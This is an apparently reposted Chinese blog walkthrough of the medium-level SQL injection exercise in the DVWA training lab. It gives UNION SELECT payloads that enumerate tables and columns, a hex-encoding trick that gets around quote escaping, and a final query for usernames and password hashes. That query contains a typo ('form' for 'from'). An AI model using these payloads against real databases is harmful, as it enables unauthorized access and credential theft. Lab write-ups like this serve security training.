dvwa闯关——medium级SQL - 代码天地

dvwa闯关——medium级SQL

其他 2020-01-05 02:34:12 阅读次数: 0

medium级的sql不让用户输入，可以通过burpsuite抓包绕过

一、判断是否有注入点，注入类型、字段数等

　　1.是否有注入即注入类型

　　

　　

　　修改为id=1 and 1=1后，如下图：

　　

　　存在注入点为数字型

　　2.判断字段数

　　1 order by 2时：

　　

　　

　　1 order by 3时：

　　

　　

　　所以字段数为2

　　3.确定回显位置

　　

　　

　　4.查询数据库及版本

　　

　　

　　5.获取数据库中所有表

　　1 union select 1,table_name from information_schema.tables where table_schema=database()

　　

　　该数据库有两张表

　　

　　6.获取列名

　　单引号被转义了，所以不能用table_name='users'获取数据，用十六进制绕过

　　1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

　　

　　列名

　　

　　7.获取用户和密码

　　1 union select user,password form users

　　

　　用户和密码

　　

　　

猜你喜欢

转载自www.cnblogs.com/walkwaters/p/12151190.html

dvwa闯关——medium级SQL

dvwa闯关——low级SQL

DVWA靶场—sql闯关

【DVWA】SQL Injection------------------------Medium

渗透测试之DVWA的Medium级别的SQL注入

（八）DVWA之SQL Injection--SQLMap&Burp测试（Medium）

XSS攻击－DVWA（Medium）

【DVWA】XSS-----------------（Medium）

DVWA-medium详解

DVWA文件上传漏洞（medium）

DVWA中Medium通关1-4

【DVWA】SQL注入

sql注入-----dvwa

DVWA之SQL Injection

DVWA——SQL Injection

DVWA —— SQL Injection分析

DVWA ---SQL Injection

对DVWA进行SQL注入

DVWA SQL盲注

sql注入(dvwa)

DVWA-SQL注入

dvwa-sql injection

DVWA（三）——SQL注入

DVWA--SQL Injection

sql dvwa注入笔记

Sql注入爆破--DVWA

DVWA 通关sql injection

【dvwa】--SQL注入

【DVWA】SQL Injection(Blid)

DVWA——SQL Injection(low)

今日推荐

周排行

AIZU 2224 Save your cats(并查集)

HTTP响应头状态码详解

Python socket编程（2）

MaxCompute Studio使用心得系列7—作业对比

Supervisor安装使用

LeetCode 164. Maximum Gap

mysql面试题: 一张表里面有ID自增主键，当insert了17条记录之后，删除了第15,16,17条记录，再把mysql重启，再insert一条记录，这条记录的ID是18还是15

nutch1.2 DeleteDuplicates IndexMerger 详解

OC - @property与setter,getter方法

SpringBoot @Transactional的rollbackFor属性

每日归档

更多

2024-09-19(0)

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)